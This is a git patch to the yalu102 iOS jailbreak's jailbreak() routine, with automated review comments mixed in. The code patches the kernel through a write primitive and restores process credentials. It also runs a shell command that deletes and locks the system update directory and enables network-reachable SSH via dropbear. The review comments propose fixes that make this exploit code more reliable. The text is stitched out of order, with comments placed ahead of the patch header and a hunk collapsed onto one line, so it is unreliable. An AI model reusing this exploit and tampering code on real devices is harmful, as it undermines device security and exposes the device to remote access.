+ // extract root file system patches
 if (installedFd == -1) {
 NSString* tarPath = [resBundle pathForResource:@"tar" ofType:nil];
 unlink("/bin/tar");
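Review bot: In the `if (cfg_enable_remote_ssh)` block of the `@@ -901` hunk, `initWithContentsOfFile:` can return nil and `a[4] = @"22"` raises NSRangeException if `ProgramArguments` holds fewer than five entries, so a dropbear.plist with a different layout aborts jailbreak() after the earlier filesystem changes have already been made; the result of `writeToFile:atomically:` is ignored as well. Because `atomically:YES` replaces the file, the `chmod`/`chown` done three lines above no longer apply to the rewritten plist unless they are repeated afterwards (ownership of the replacement is not visible here, so confirm before relying on it). A comment on the index should also say what argument is being replaced, e.g. `// argument 4 presumably is the listen address: a bare port makes dropbear reachable from the network, not just loopback — confirm against dropbear.plist`, since that is the security-relevant effect of the switch. jailbreak() continues far outside the hunk.
```objc
        if (cfg_enable_remote_ssh) {
            NSLog(@"enabling SSH remote access");
            NSString *plistPath = @"/Library/LaunchDaemons/dropbear.plist";
            NSMutableDictionary* md = [[NSMutableDictionary alloc] initWithContentsOfFile:plistPath];
            NSMutableArray *a = [NSMutableArray arrayWithArray:[md valueForKey:@"ProgramArguments"]];
            if (md == nil || a.count <= 4) {
                NSLog(@"dropbear.plist has an unexpected layout, leaving it unchanged");
            } else {
                a[4] = @"22";
                [md setValue:a forKey:@"ProgramArguments"];
                if (![md writeToFile:plistPath atomically:YES]) {
                    NSLog(@"failed to rewrite dropbear.plist");
                } else {
                    // the atomic write replaced the file: restore mode and owner set above
                    chmod("/Library/LaunchDaemons/dropbear.plist", 0644);
                    chown("/Library/LaunchDaemons/dropbear.plist", 0, 0);
                }
            }
        }
```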
@@ -880,15 +885,15 @@ void jailbreak(void) {
 close(installedFd);
 }
+
+ // install usermode reload script
 {
 NSString* reloadPath = [resBundle pathForResource:@"reload" ofType:nil];
 unlink("/usr/libexec/reload");
 copyfile([reloadPath UTF8String], "/usr/libexec/reload", 0, COPYFILE_ALL);
 chmod("/usr/libexec/reload", 0755);
 chown("/usr/libexec/reload", 0, 0);
- }
- {
 NSString* reloadPlistPath = [resBundle pathForResource:@"0.reload.plist" ofType:nil];
 unlink("/Library/LaunchDaemons/0.reload.plist");
 copyfile([reloadPlistPath UTF8String], "/Library/LaunchDaemons/0.reload.plist", 0, COPYFILE_ALL);
@@ -896,6 +901,7 @@ void jailbreak(void) {
 chown("/Library/LaunchDaemons/0.reload.plist", 0, 0);
 }
+ // install SSH agent
 {
 NSString* dropbearPlistPath = [resBundle pathForResource:@"dropbear.plist" ofType:nil];
 unlink("/Library/LaunchDaemons/dropbear.plist");
@@ -919,9 +925,10 @@ void jailbreak(void) {
 chmod("/private/var/mobile", 0777);
 chmod("/private/var/mobile/Library", 0777);
 chmod("/private/var/mobile/Library/Preferences", 0777);
- system("rm -rf /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate; touch /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate; chmod 000 /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate; chown 0:0 /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate"); */
+ system("rm -rf /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate; touch /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate; chmod 000 /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate; chown 0:0 /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate");
+
 system("(echo 'really jailbroken'; /bin/launchctl load /Library/LaunchDaemons/0.reload.plist)&");
 WriteAnywhere64(bsd_task+0x100, orig_cred);
From c23a1af53ef854ece5de3e9070ace4aadf64df06 Mon Sep 17 00:00:00 2001
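Review bot: The reenabled `system("rm -rf ... chown 0:0 ...")` call in the `@@ -919` hunk discards its return value, so if any of the four shell steps fails the OTA block is silently incomplete while the rest of the routine carries on; at least capture it, `int rc = system("rm -rf ...");` followed by `if (rc != 0) NSLog(@"OTA block failed: %d", rc);`, so a partial result shows up in the log. The removed line ended in `*/` while no matching `/*` is visible in the hunk, so it is worth confirming that the enclosing comment is still balanced after this change (the commit evidently built, but the rendering here drops context). The other hunks of this commit add section headings; this block has none, and `// keep OTA updates from being staged: replace the SoftwareUpdate asset directory with an unreadable, root-owned placeholder` would say what the reenabled command is for. jailbreak() continues on both sides of the hunk.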
From: Oliver Kuckertz
Date: Tue, 31 Jan 2017 14:09:29 +0100
Subject: [PATCH 34/34] Cosmetics
---
 yalu102/jailbreak.m | 20 +++++++++++---------
 1 file changed, 11 insertions(+), 9 deletions(-)
diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m
index 82e9c07..aa04351 100644
--- a/yalu102/jailbreak.m
+++ b/yalu102/jailbreak.m
@@ -199,7 +199,8 @@ void jailbreak(void) {
 kerndumpbase = seg->vmaddr;
 }
 kerndumpsize += seg->vmsize;
- } else if (load_cmd->cmd == LC_UNIXTHREAD) {
+ }
+ else if (load_cmd->cmd == LC_UNIXTHREAD) {
 struct {
 unsigned long cmd; /* LC_THREAD or LC_UNIXTHREAD */
 unsigned long cmdsize; /* total size of this command */
@@ -539,8 +540,8 @@ void jailbreak(void) {
 {
 uint64_t endf = prelink_base+prelink_size;
 uint64_t ends = whole_size - (endf - whole_base);
- uint32_t* opps_stream = whole_dump + endf - whole_base;
- uint64_t* ptr_stream = whole_dump + endf - whole_base;
+ uint32_t* opps_stream = (uint32_t*)(whole_dump + endf - whole_base);
+ uint64_t* ptr_stream = (uint64_t*)(whole_dump + endf - whole_base);
 uint64_t lastk = 0;
 int streak = 0;
@@ -567,11 +568,11 @@ void jailbreak(void) {
 }
 if (streak == 9) {
- char* sbstr = whole_dump + lastk + endf - whole_base - 8;
+ uint8_t* sbstr = whole_dump + lastk + endf - whole_base - 8;
 uint64_t extract_attr_recipe = *(uint64_t*)(sbstr + 72 * 0x20 + 8 /*fptr*/);
- uint32_t* opcode_stream = extract_attr_recipe - whole_base + whole_dump;
+ uint32_t* opcode_stream = (uint32_t*)(extract_attr_recipe - whole_base + whole_dump);
 int l = 0;
 while (1) {
@@ -611,7 +612,7 @@ void jailbreak(void) {
 uint64_t tfp = *(uint64_t*)(sbstr + 45 * 0x20 + 8 /*fptr*/);
- opcode_stream = (uint32_t*)(tfp - whole_base + whole_dump);
+ opcode_stream = (uint32_t*)(tfp - whole_base + whole_dump);
 int cbz = 0;
 while (1) {
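Review bot: The casts added in the `@@ -539` hunk (and the same pattern in `@@ -567` and `@@ -611`) silence the pointer-conversion warnings but leave the reads as `uint32_t`/`uint64_t` accesses through a byte buffer at offsets such as `endf - whole_base` and `lastk + ... - 8`, which are unaligned and type-punned; that is undefined behaviour in C even though arm64 tolerates it in practice, and the context line `*(uint64_t*)(sbstr + 72 * 0x20 + 8 /*fptr*/)` has the same problem. Copy the value out instead, `uint64_t extract_attr_recipe; memcpy(&extract_attr_recipe, sbstr + 72 * 0x20 + 8 /*fptr*/, sizeof extract_attr_recipe);`, and read `opps_stream`/`ptr_stream` elements through a small static helper that does the same `memcpy`. Whether `whole_dump` itself is 8-byte aligned is not visible in these hunks; a `malloc` base would be, but `endf - whole_base` need not keep it so. Since the commit is labelled Cosmetics, a one-line comment on each cast noting that the alignment is unverified would at least record the assumption; jailbreak() extends far outside these hunks.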
@@ -627,10 +628,11 @@ void jailbreak(void) { } - /* - nonceenabler - */ { + /* + nonceenabler + */ + uint64_t endf = prelink_base+prelink_size; uint64_t ends = whole_size - (endf - whole_base); char* sbstr = memmem(whole_dump + endf - whole_base, ends, "com.apple.System.boot-nonce", strlen("com.apple.System.boot-nonce"));